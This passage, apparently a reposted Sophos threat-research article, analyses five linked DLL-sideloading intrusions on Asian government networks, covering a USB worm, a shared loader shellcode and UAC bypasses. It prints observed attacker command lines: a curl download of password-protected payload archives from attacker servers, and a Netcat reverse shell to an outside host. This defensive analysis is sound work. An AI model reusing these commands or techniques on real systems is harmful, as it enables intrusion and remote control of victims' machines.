{"id":20534,"date":"2022-11-03T05:20:52","date_gmt":"2022-11-03T13:20:52","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2022\/11\/03\/news-14267\/"},"modified":"2022-11-03T05:20:52","modified_gmt":"2022-11-03T13:20:52","slug":"news-14267","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/11\/03\/news-14267\/","title":{"rendered":"Family Tree: Related DLL-Sideloading Cases Bear Strange Fruit"},"content":{"rendered":"<p><strong>Credit to Author: Gabor Szappanos| Date: Thu, 03 Nov 2022 12:03:13 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p>We have observed multiple attacks targeting government organizations in Asia, all involving DLL sideloading \u2013 historically a favorite technique of China-based APT groups &#8212; <a href=\"https:\/\/news-sophos.go-vip.net\/wp-content\/uploads\/sites\/2\/2013\/05\/sophosszappanosplugxmalwarefactoryversion6-rev3.pdf\">as far back as 2013<\/a> and <a href=\"https:\/\/news.sophos.com\/en-us\/2020\/11\/04\/a-new-apt-uses-dll-side-loads-to-killlsomeone\/\">as recently as 2020<\/a>. In this article, we look at the evidence that connects five of them, showing how threat actors base their attacks on well-known, effective techniques, adding complexity and variation over time. Understanding how cases are related helps defenders (and customers) think about not just who\u2019s doing the attacking, but about what kind of threats may be afoot \u2013 and, naturally, how to prioritize analysis and defense for best results.<\/p>\n<p>In the most interesting of the five cases, a USB worm infected organizations in Southeast Asia. This worm copies everything it finds in specific directories when replicating itself, including components of other APT attacks by <a href=\"https:\/\/www.crowdstrike.com\/blog\/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda\/\">Mustang Panda<\/a> and <a href=\"https:\/\/securelist.com\/apt-luminousmoth\/103332\/\">LuminousMoth<\/a>. We don\u2019t have any evidence that the three APTs are linked, and we also know that multiple USB worms, when infecting systems simultaneously, may inadvertently combine their files. \u00a0(This is similar to <a href=\"https:\/\/en.wikipedia.org\/wiki\/Macro_and_security#%22Mating%22_macro_viruses\">macro virus mating<\/a>, a phenomenon identified <a href=\"https:\/\/www.sciencedirect.com\/science\/article\/pii\/S016740489788131X\">over twenty-five years ago<\/a>.)<\/p>\n<p>The case involving the USB worm has significant overlap with the other four cases we observed, including loader DLLs using the same kind of code flow obfuscation and identical loader shellcode. We can\u2019t be sure that it\u2019s the same threat actor behind both the USB worm case and the other attacks \u2013 it may be different threat actors with access to the same tooling \u2013 but the similarities are compelling.<\/p>\n<p>We\u2019ll take a deep dive into all five cases, further detailing the infection timeline of the USB-worm attack in an appendix. We\u2019ll spotlight a piece of shell code that seems to be the common thread in all five cases, and then dig into extended step-by-step breakdowns of seven scenarios we associate with these cases. We\u2019ll close with indicators of compromise associated with these cases, which we will also make available on our GitHub.<\/p>\n<p>Before all that, though, it\u2019s worth briefly defining what DLL sideloading is, as it\u2019s often confused with a similar attack called DLL preloading.<\/p>\n<h2>About DLL sideloading and preloading<\/h2>\n<p>DLL sideloading and preloading (sometimes known as search-order hijacking) are both attacks that hijack execution flow, although there is a subtle distinction between them.<\/p>\n<p><strong>DLL preloading (AKA search order hijacking) \u2013 <\/strong><a href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/001\/\"><strong>T1574\/001<\/strong><\/a><\/p>\n<ul>\n<li>An attacker plants a malicious DLL in a directory that will be searched by a pre-existing application before the location of a legitimate library (based on the <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/dlls\/dynamic-link-library-search-order\">default Windows search order)<\/a>.<\/li>\n<li>For example, if a legitimate application has to load <em>dll<\/em> and doesn\u2019t specify a location, it will search the current directory first, then other directories as per the Windows search order.<\/li>\n<li>If an attacker has write permissions to a directory in the search order list, they can plant a malicious DLL called <em>dll <\/em>in that directory<em>,<\/em> which the application will then load (assuming the legitimate DLL has not already been loaded into memory, and wasn\u2019t found in any previous search locations).<\/li>\n<li>The attacker then waits for the pre-existing legitimate application to be executed, or forces this process (e.g., by rebooting the machine).<\/li>\n<\/ul>\n<p><strong>DLL sideloading \u2013 <\/strong><a href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/002\/\"><strong>T1574\/002<\/strong><\/a><\/p>\n<ul>\n<li>As above, except the attacker plants and invokes a legitimate application that loads the malicious DLL. This allows the attacker to take advantage of the trust the system already has in the application.<\/li>\n<li>This technique has been used by various threat actors, <a href=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/revil-ransomware-uses-dll-sideloading\/\">including REvil<\/a>.<\/li>\n<\/ul>\n<h2>User cases<\/h2>\n<p>A number of user reports led us to initially spot the threat actor\u2019s activities. We\u2019ll start with the most basic case and progress to the four more complex examples.<\/p>\n<h3>Case 1: Basic Bad Behavior<\/h3>\n<p>This was the case that first drew our attention to the malicious server 91.245.253[.]52, which appears repeatedly in these attacks.<\/p>\n<p>This case came to light thanks to a stager alert (DynamicShellcode) received from a customer. The malicious payload (SSCE5532.dll) was executed via the command prompt, as shown in the following process trace:<\/p>\n<pre>1\u00a0 C:WindowsSysWOW64rundll32.exe [5624]  rundll32.exe\u00a0 SSCE5532.dll RunMain  2\u00a0 C:WindowsSystem32rundll32.exe [7864]  rundll32.exe\u00a0 SSCE5532.dll RunMain  3\u00a0 C:WindowsSystem32cmd.exe [3288]  4\u00a0 C:Windowsexplorer.exe [4628]<\/pre>\n<p>The threat actor placed the malicious DLL on the desktop. It executed shellcode for a standard Metasploit (or, possibly, Cobalt Strike) reverse HTTP shell, connecting to the following attacker-controlled server:<\/p>\n<pre>91.245.253.52:6060\/rKVI<\/pre>\n<h3>Case 2: Double Trouble<\/h3>\n<p>We started looking for other cases involving the 91.245.253[.]52 server, and we found them. This one involves <em>two<\/em> DLL sideloading attacks.<\/p>\n<h4>2.1: First sideloading attack<\/h4>\n<p>The initial infection consists of ciscocollabhost.exe, a clean and digitally signed Cisco application that, on execution, loads ciscoparklauncher.dll, a malicious DLL.<\/p>\n<p>Our telemetry indicates that ciscosparklauncher.dll is a loader and that the payload could be a file named 2831329086.inf, located in the same directory.<\/p>\n<p>Next, a password-protected RAR archive is downloaded from a distribution server and unpacked, as shown in these command lines:<\/p>\n<pre>http:\/\/5.252.178.162\/IJOINOIS\/c.rar -o   C:\\users\\public\\libraries\\c.rar\",  \u00a0 \u00a0 \"commandLine\" : \"c:\\windows\\system32\\cmd.exe \/C   c:\\progra~1\\winrar\\rar.exe x -hpNONI*(uy23oninjfoisjnsofnsc   C:\\users\\public\\libraries\\c.rar\u00a0 C:\\Users\\Public\\libraries\"<\/pre>\n<p>The RAR archive contains the following files:<\/p>\n<pre>86f7661039a0855be8d6d1cb55391f398932e80c\u00a0 googleupdate.exe (clean VLC EXE)  ed67a11646c1b28bc856941743331acb47f1b7b4\u00a0 goopdate.ja (encrypted implant)  e5be6f621c4a10372837baf795a37b1caa942d23\u00a0 libvlc.dll (malicious loader)  b2eb8516ab136aa44106c13cc859dcee77d1bc1f\u00a0 loader.ja (encrypted implant)  d90355d2a53b662c1d3fe7ab4430d3955a54f73f\u00a0 time.sig (encrypted config)<\/pre>\n<h4>2.2: Second sideloading attack<\/h4>\n<p>Next, the executable googleupdate.exe (which, despite its name, has nothing to do with Google; it\u2019s a clean, digitally signed VLC Media Player application) in c.rar is used to sideload libvlc.dll, a malicious loader that loads the payloads from the encrypted implants in the archive.<\/p>\n<p>Conveniently, those implants write out detailed debug logs on their progress:<\/p>\n<p>p1-p11: privilege escalation progress messages<br \/> x1-x4: module execution progress messages<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87827\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png\" alt=\"A debugger screenshot showing events being logged\" width=\"640\" height=\"648\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png 654w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png?resize=296,300 296w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png?resize=32,32 32w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png?resize=50,50 50w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png?resize=64,64 64w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png?resize=96,96 96w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 1: Events conveniently logged<\/em><\/p>\n<p>Once this second sideloading attack is complete, the malware connects to the stager server, this time over port 443.<\/p>\n<h3>Case 3: Something Extra<\/h3>\n<p>This attack was detected by Sophos\u2019 HeapHeapProtect dynamic-shellcode mitigation, which prevents code running in heap space from adding arbitrary code into the memory space of the original application, and similarly prevents lateral code injection into other applications (and flags the attempt). As in the previous case, this attack featured two sideloading attempts. In fact, the first was exactly the same as seen in the previous two cases.<\/p>\n<h4>3.1: First sideloading attack<\/h4>\n<p>The first attack featured the same executable and malicious DLL as we saw in the other cases, and we once again observed a connection to 91.245.253[.]52. Next came the downloading and unpacking of a password-protected RAR file, using a different distribution server:<\/p>\n<pre>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0\"commandLine\" : \"curl\u00a0 -k   http:\/\/103.253.72.116\/akjsdnfkjsnjfekse\/walk.rar -o   C:\\users\\public\\libraries\\walk.rar\",  \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \"commandLine\" : \"C:\\Progra~1\\WinRAR\\Rar.exe\u00a0 x -  hplic\\down443 C:\\users\\public\\libraries\\walk.rar   C:\\Users\\Public\\Downloads\\\",<\/pre>\n<p>The walk.rar archive contained six files: three encrypted implants and an encrypted config (all with a PLG extension), a clean executable (Netsky.exe, a Razer Chromium Render Process), and a malicious DLL (RzLog4CPP_Logger.dll).<\/p>\n<h4>3.2: Second sideloading attack<\/h4>\n<p>The second attack used the loader Netsky.exe and the malicious RzLog4CPP_Logger.dll from the first part of the attack, which decrypts and loads alloc.plg, one of the encrypted implants. In turn, this implant loads the others.<\/p>\n<p>We also noted that the attacker executed 2.exe, with the path of NetSky.exe as an argument. The function of this executable is currently unclear.<\/p>\n<h3>Case 4: The Worm Circus<\/h3>\n<p>We found this case by running a <a href=\"https:\/\/support.virustotal.com\/hc\/en-us\/articles\/360001293377-Retrohunt\">VirusTotal RetroHunt<\/a> using the characteristics of the sideloading DLLs we spotted in the previous cases. Of the five cases we\u2019ll cover, this could be considered the most complex, and we will return to it later in this article when we do a deeper analysis of infection timelines for these cases. It includes three sideloading efforts.<\/p>\n<p>We noted a significant code overlap (especially in the loader shellcode) between this case and the other sideloading cases discussed so far, so we think this was also run by the same threat actor. However, the payload turned out to be totally different: a USB worm. We\u2019re uncertain as to the purpose of this worm. It collects all files from the root of the USB drives and copies them as the infection spreads to other devices. It could be a deliberate data exfiltration method, or just an unwanted side effect of the propagation process.<\/p>\n<p>In this case, the threat actor used a clean usbconfig.exe executable using multiple names (disk_watch.exe, usb drive.exe, and Removable Disk.exe); an encrypted implant (usb.ini); and u2ec.dll, a malicious loader for the implant.<\/p>\n<h4>4.1: USB worm mating<\/h4>\n<p>In Case 4, we observed sideloading components from two other APT groups &#8212; <a href=\"https:\/\/blog.talosintelligence.com\/2022\/05\/mustang-panda-targets-europe.html\">Mustang Panda<\/a> and <a href=\"https:\/\/securelist.com\/apt-luminousmoth\/103332\/\">LuminousMoth<\/a> \u2013 in the same directory as files from the original threat actor. We think that the presence of these two additional APTs is collateral damage during the file-collection process, rather than an indication of collusion.<\/p>\n<p>The files corresponding to the sideloading attack included disk_watch.exe and u2ec.dll. \u00a0Files corresponding to Mustang Panda included rzlog4cpp.dll (a Mustang Panda reverse shell, not to be confused with the RzLog4CPP_Logger.dll we saw in Case 3), wuwebv.exe (a clean but renamed copy of Netcat), and two DLLs that were clean dependencies of Netcat.<\/p>\n<p>The rzlog4cpp.dll establishes a reverse shell by invoking the Netcat component with the following command line:<\/p>\n<pre>cmd.exe \/C wuwebv.exe -t -e c:windowssystem32cmd.exe   closed.theworkpc.com 80<\/pre>\n<p>Files corresponding to LuminousMoth included msbuild.exe, a clean Silverlight launcher; and version.dll, a malicious DLL. The latter file is also a USB worm, operating in a similar way as the usb.ini implant mentioned previously in Case 4. It is associated with LuminousMoth APT activities <a href=\"https:\/\/www.kaspersky.com\/about\/press-releases\/2021_rare-mass-advanced-threat-campaign-targets-more-than-a-thousand-users-in-southeast-asia\">seen<\/a> in 2021.<\/p>\n<p>We identified one other component, a clean copy of Microsoft\u2019s WinWord.exe. Its role is unknown, although Kaspersky researchers have speculated that it may have been used to sideload a malicious DLL, wwlib.dll.<\/p>\n<h3>Case 5: Triple Threat<\/h3>\n<p>The last case we\u2019ll examine involved three different sideloading attacks, as Case 4 did (though no worm was detected). We covered the first two attacks in Case 3, although we noticed a slight difference this time. The \u201cTriple Threat\u201d also has echoes of Case 2, as you\u2019ll see.<\/p>\n<h4>5.1: First sideloading attack<\/h4>\n<p>As in Case 2, the threat actor used ciscocollabhost.exe and ciscosparklauncher.dll, and downloaded, unpacked, and executed c.rar from 5.252.178[.]162\/IJOINOIS.<\/p>\n<p>However, this time the threat actor also downloaded and executed an additional password-protected RAR archive, v1.rar, from 103.253.72.[.]116\/_akjsdnfkjsnjfekse. (We saw that IP address already, in Case 3.) v1.rar contains clean copies of smstore.exe and msvcrt.dll (both legitimate Microsoft files) and SYSMSRV.dll, a malicious DLL.<\/p>\n<h4>5.2: Second sideloading attack<\/h4>\n<p>This attack used googleupdate.exe (the clean VLC executable) and libvlc.dll, a malicious DLL, as described in Case 2.<\/p>\n<pre>c:userspubliclibrariesoutgoogleupdate.exe : \u00a0  6f924de3f160984740fbac66cf9546125330fc00f4f5d2dbf05601d9d930b7d9  c:userspubliclibrariesoutlibvlc.dll :   2fd75763307c5aec5603adc6d02a7c5f34d605a0989e856001b4ae2eef2b4327<\/pre>\n<h4>5.3: Third sideloading attack<\/h4>\n<p>This attack used the same files from v1.rar, although the threat actor also used a UAC bypass trick to execute commands \u2013 including an unidentified file, 3.exe. (We\u2019ll detail this bypass trick below as Scenario 5.) As with \u201c2.exe\u201d in Case 3, the purpose of this executable is unknown.<\/p>\n<h2>The common thread: Loader shellcode<\/h2>\n<p>We\u2019ve lain out five cases; let\u2019s look at the common threads.<\/p>\n<p>First, the malicious server 91.245.253[.]52 \u2013 our first clue in the investigation, as noted in Case 1 &#8212; made an appearance in every case. Other interesting traces are shown in the chart below.<\/p>\n<p><em>Table 1: Various traces and IoCs noted among the five DLL sideloading cases<\/em><\/p>\n<p>More significantly, when the sideloader DLL decrypts the plugin, it follows the execution by jumping to the first byte of the file. The file content of the decrypted plugin starts with a short PE loader shellcode, which loads the encrypted plugin DLL. This loader shellcode is the same in all seven scenarios described in the following sections, which establishes a strong connection among them.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image2.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-87828 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image2.png\" alt=\"Screenshot of a disassembly showing the loader shellcode\" width=\"524\" height=\"734\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image2.png 524w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image2.png?resize=214,300 214w\" sizes=\"auto, (max-width: 524px) 100vw, 524px\" \/><\/a><\/p>\n<p><em>Figure 2: The shared loader shellcode<\/em><\/p>\n<p>Similar to <a href=\"https:\/\/www.sophos.com\/en-us\/medialibrary\/pdfs\/technical%20papers\/plugx-thenextgeneration.pdf\">PlugX loaders<\/a>, this shellcode loader overwrites the first 0x1000 bytes of the decrypted and loaded plugin DLL with zero bytes.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87829\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png\" alt=\"Screenshot of a disassembly showing a loop\" width=\"640\" height=\"625\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png 866w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png?resize=300,293 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png?resize=768,750 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png?resize=32,32 32w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png?resize=50,50 50w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png?resize=64,64 64w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 3: The loop that fills the first 0x1000 bytes with zero bytes<\/em><\/p>\n<h2>Under the hood: Five cases, seven scenarios<\/h2>\n<p>Moving on, we\u2019ll dissect some of the more interesting activities we spotted during analysis. We\u2019ll dissect one scenario from each of our five cases, and look in addition at two earlier finds that appear to be related to these cases. We should note that normally, we\u2019d expect to see one scenario (clean loader + malicious loader + plugins) per case, but a couple of these cases literally doubled up. (Why they would do that is left as a conjecture for the reader.) For ease of reference, we\u2019ll letter our scenarios \u2013 A, B, C, D, E \u2013 and identify the case to which it is related.<\/p>\n<p>We discovered the two \u201cextra\u201d scenarios \u2013 F, G &#8212; by taking the information we had from our five cases and looking beyond our own data to see what other defenders might have already discovered but not yet flagged as part of a larger threat. They\u2019re presented here to show how else these attacks might present to threat hunters, and to give some indication of just how long-running the threat might be.<\/p>\n<p>Another of the interesting variations we found in this set of cases is that similar or identical configuration data is stored in multiple plugins. We\u2019ll show this in detailed analysis of the specific plugins.<\/p>\n<h3>From Case 1: Scenario A, the initial loader<\/h3>\n<p>This was the initial infection, which consisted of the following components:<\/p>\n<pre>c:userspubliclibrariesciscocollabhost.exe :   7b301cea1feff0add8de512a93ed7bc1b8330caf0c3a6f1585f9887b88db8efb   (clean loader)  c:userspubliclibrariesciscosparklauncher.dll :   a73053f5410de74c8689d5a0da0df72adaa28055562626003d1b446c754d79e6   (sideloader DLL)  c:userspubliclibraries2831329086.inf (payload)<\/pre>\n<h4>Implants<\/h4>\n<p>The implant had the name 2831329086.inf, and was placed in the same directory as the sideloader DLL. We don\u2019t have the implant, so we can only guess at its behavior based on the activity logs.<\/p>\n<h3>From Case 2: Scenario B, the \u201ccool client\u201d<\/h3>\n<p>The files belonging to this scenario were found in the downloaded c.rar described in Case 2.<\/p>\n<p>This campaign was dubbed \u201cCool Client\u201d by its developers, based on leftover development information in the components.<\/p>\n<h4>Sideloader DLLs<\/h4>\n<h4>libvlc.dll<\/h4>\n<p>Compile time: 2021-May-10 19:40:05<\/p>\n<p>PDB path: G:project\u6728\u9a6c<strong>CoolClient<\/strong>hijack_exportlibvlcReleaselibvlc.pdb<\/p>\n<p>PDB File Name : G:project\u6728\u9a6cCoolClienthijack_exportlibvlcRelease<strong>libvlc.pdb<\/strong><br \/> (Translation of the Chinese text: <em>Trojan horse<\/em>)<\/p>\n<p>Most of the libvlc exports are dummy (RET) functions that immediately exit &#8212; except for libvlc_new, which is the main function.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image4.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87830\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image4.png\" alt=\"Screenshot of a disassembly showing the libvlc_new function\" width=\"640\" height=\"509\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image4.png 988w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image4.png?resize=300,239 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image4.png?resize=768,611 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 4: libvlc_new has a few things going on, in fact<\/em><\/p>\n<p>The DLL has a default config structure. The config data is stored in a memory region. First it is initialized with the hardcoded config, and then this region is overwritten with whatever the decrypted content of time.sig isThe first value looks like an ID string for the config structure, the second one is an encryption key, and the third one should be the C2 address.<\/p>\n<pre>cfg_find_tag  e4adbd50cf4e608d7cd3cf16022831ab  192.168.211.1<\/pre>\n<p>These are default values, as indicated by the RFC 1918 IP address. To update with the real values, the process loads time.sig and decrypts the config info from it, overriding the default configuration with the target system\u2019s actual configuration. During this process it:<\/p>\n<ul>\n<li>Replaces the default values in the memory with the new ones<\/li>\n<li>Loads the implant file c:programdataGoogleUpdateUpdateTime.ja<\/li>\n<li>Installs itself as a service named gupdaten<\/li>\n<li>Looks for the presence of c:windowssystem32clb.dll. If the file is not found, the process terminates<\/li>\n<li>If c:programdataGoogleUpdateloader.ja does exist, the process decrypts and executes loader.ja<\/li>\n<li>loader.ja is injected into the winver.exe process (process hollowing; we\u2019ll have more to say about this technique in Scenario 3)<\/li>\n<li>In addition to the default config, it contains the internal IP address 192.168.211.13. The purpose is unclear at this time.<\/li>\n<\/ul>\n<h4>Implants<\/h4>\n<p>These are the encrypted modules that are loaded and executed during the infection process.<\/p>\n<h4>Loader.ja<\/h4>\n<p>Compile time: 2021-May-31 01:23:24<\/p>\n<p>It appears to contain default config data, similar to libvlc.dll, and is likewise overwritten via time.sig<\/p>\n<p>Relevant strings from the embedded config structure:<\/p>\n<pre>cfg_find_tag  mark  group  192.168.211.1  e4adbd50cf4e608d7cd3cf16022831ab<\/pre>\n<p>Another internal IP address, 192.168.211.13, is stored elsewhere.<\/p>\n<p>The implant employs a <a href=\"https:\/\/gist.github.com\/api0cradle\/d4aaef39db0d845627d819b2b6b30512\">UAC bypass using the CMSTPLUA COM interface<\/a>, and\u00a0injects the created process into winver.exe. Processes are created for these files:<\/p>\n<pre>c:programdataGoogleUpdategoopdate.ja  c:programdataGoogleUpdatesession.ja<\/pre>\n<p>This sequence:<\/p>\n<ol>\n<li>Stops the avp.exe process (avp.exe is the core component of Kaspersky\u2019s antivirus solution; this is an attempt to evade detection)<\/li>\n<li>Creates a registry autorun key: HKCUSoftwareMicrosoftWindowsCurrentVersionRungoopdate<\/li>\n<li>Adds a service called gupdaten<\/li>\n<\/ol>\n<h4>goopdate.ja<\/h4>\n<p>Compile time: 2021-06-03 01:28:52<\/p>\n<p>PDB path:<\/p>\n<p>PDB File Name: G:project\u6728\u9a6cCoolClientmainReleasemain.pdb<br \/> (Translation of the Chinese text: <em>Trojan horse<\/em>)<\/p>\n<p>This file refers to several source files in its code, including:<\/p>\n<pre>g:project..coolclientmainmainckernelmanager.cpp  g:project..coolclientmainmaincmyudpclient.cpp  g:project..coolclientmainmaincmytcpclient.cpp<\/pre>\n<p>As with previous examples, this implant contains default config data:<\/p>\n<pre>cfg_find_tag  mark  group  e4adbd50cf4e608d7cd3cf16022831ab  192.168.211.153<\/pre>\n<p>as well as the internal IP address 192.168.211.13.<\/p>\n<p>This plugin registers the clean loader executable for autostart as a service. (As flagged above, this is a service claiming to be Google Update, but is actually a VLC media player executable.)<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87831\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png\" alt=\"Screenshot of the Windows registry editor, showing the gupdaten service created as a key\" width=\"640\" height=\"172\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png 1228w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png?resize=300,81 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png?resize=768,206 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png?resize=1024,275 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 5: The new \u201cservice\u201d gupdaten<\/em><\/p>\n<h4>session.ja and UpdateTime.ja<\/h4>\n<p>We didn\u2019t obtain these implants. All we know is that loader.ja refers to them and would load them if they existed,<\/p>\n<h4>time.sig<\/h4>\n<p>This file contains encrypted config information, as shown in Figure 6:<\/p>\n<pre class=\"Codesample\">cfg_find_tag  None  machinetimeer  www.machinetimeer.com  www.machinetimeer.com  192.168.211.153  192.168.211.13  tests5  123456<\/pre>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image6.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87832\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image6.png\" alt=\"Hex dump of the config file, showing machinetimeer and machinetimeer.com\" width=\"640\" height=\"318\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image6.png 682w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image6.png?resize=300,149 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 6: A look at the hex related to machinetimeer<\/em><\/p>\n<h3>From Case 3: Scenario C, the VTCP gambit<\/h3>\n<p>Code analysis shows that this scenario is built around vtcp.dll (the entirety of which is actually embedded into the main implant; it\u2019s not just that the source code is linked into the plugin!) from the Trochilus RAT collection. These files were in the downloaded walk.rar archive.<\/p>\n<h4>Sideloader DLLs<\/h4>\n<h4>RzLog4CPP_Logger.dll<\/h4>\n<p>Compile time: 2021-Aug-19 21:40:13<\/p>\n<p>This contains a digital signature, seemingly from Google LLC (but really another self-signed fake):<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image7.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87833\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image7.png\" alt=\"Screenshot of digital signature details\" width=\"640\" height=\"705\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image7.png 750w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image7.png?resize=272,300 272w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 7: A certificate that\u2019s not what it claims to be<\/em><\/p>\n<p>Thumbprint:\u00a0\u00a0\u00a0 747EC25FDC3710E46D69135FAE8797718B967E25<br \/> Algorithm:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 sha256RSA<br \/> Valid from:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 5:52 AM 5\/10\/2021<br \/> Valid to:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 5:52 AM 5\/10\/2023<\/p>\n<p>This uses the same code flow obfuscation as libvlc.dll. It loads and decrypts alloc.plg.<\/p>\n<h4>Implants<\/h4>\n<h4>alloc.plg<\/h4>\n<p>Compile time: 2021-Aug-19 22:38:47<\/p>\n<p>Contains an encrypted embedded PE, which has a Chinese PDB string:<\/p>\n<p>Compile time: 2018-Feb-10 19:04:13<br \/> PDB File Name : G:ROOT\u4ee3\u7801\u5de5\u7a0b\u6728\u9a6c\u6280\u5de7\u6536\u96c638dllRelease38dll.pdb<\/p>\n<p>(Translation: G:ROOTCode ProjectTrojanTrick Collection38dllRelease38dll.pdb)<\/p>\n<p>The implant executes wusa.exe (and possibly grabs its process token).<\/p>\n<p>As Microsoft describes it, this creates a new process and its primary thread; the new process runs the specified executable file in the security context of the specified credentials (user, domain, and password). It can optionally load the user profile for a specified user. Abuse of this technique was <a href=\"https:\/\/twitter.com\/vk_intel\/status\/991226679380074496\">previously noted by researcher Vitali Kremez in 2018<\/a> and is associated with the <a href=\"https:\/\/blog.talosintelligence.com\/2016\/09\/tofsee-spam.html\">Tofsee<\/a> plugin-based spambot. It is probably a Vault7 fileless AlwaysNotify UAC bypass, similar to <a href=\"https:\/\/gist.github.com\/dezhub\/c0fee68d1e06657a45ec39365362fca7\">this one<\/a>.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87834\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png\" alt=\"A disassembly of a UAC bypass function\" width=\"640\" height=\"119\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png 1476w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png?resize=300,56 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png?resize=768,143 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png?resize=1024,190 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 8: A UAC bypass in action<\/em><\/p>\n<p>username: uac<br \/> domain: is<br \/> password: useless<\/p>\n<p>This hollows free.plg into dllhost.exe. (<a href=\"https:\/\/attack.mitre.org\/techniques\/T1055\/012\/\">Hollowing<\/a>, mentioned also in Scenario 2, is an attack in which a threat actor removes code in an executable, in this case dllhost, and embeds malicious code in order to trick the target machine into running the \u201ctrusted\u201d executable.) Possible command-line parameters, which are passed to the clean loader when executed, include:<\/p>\n<p>passuac<br \/> online<br \/> install<\/p>\n<p>This uses <a href=\"https:\/\/gist.github.com\/api0cradle\/d4aaef39db0d845627d819b2b6b30512\">UAC_Bypass_CMSTPLUA<\/a> and creates a service (InstallSvc) with the command &#8216;C:ProgramDataNetskyNetSky.exe online&#8217;.<\/p>\n<h4>free.plg<\/h4>\n<p>Compile time 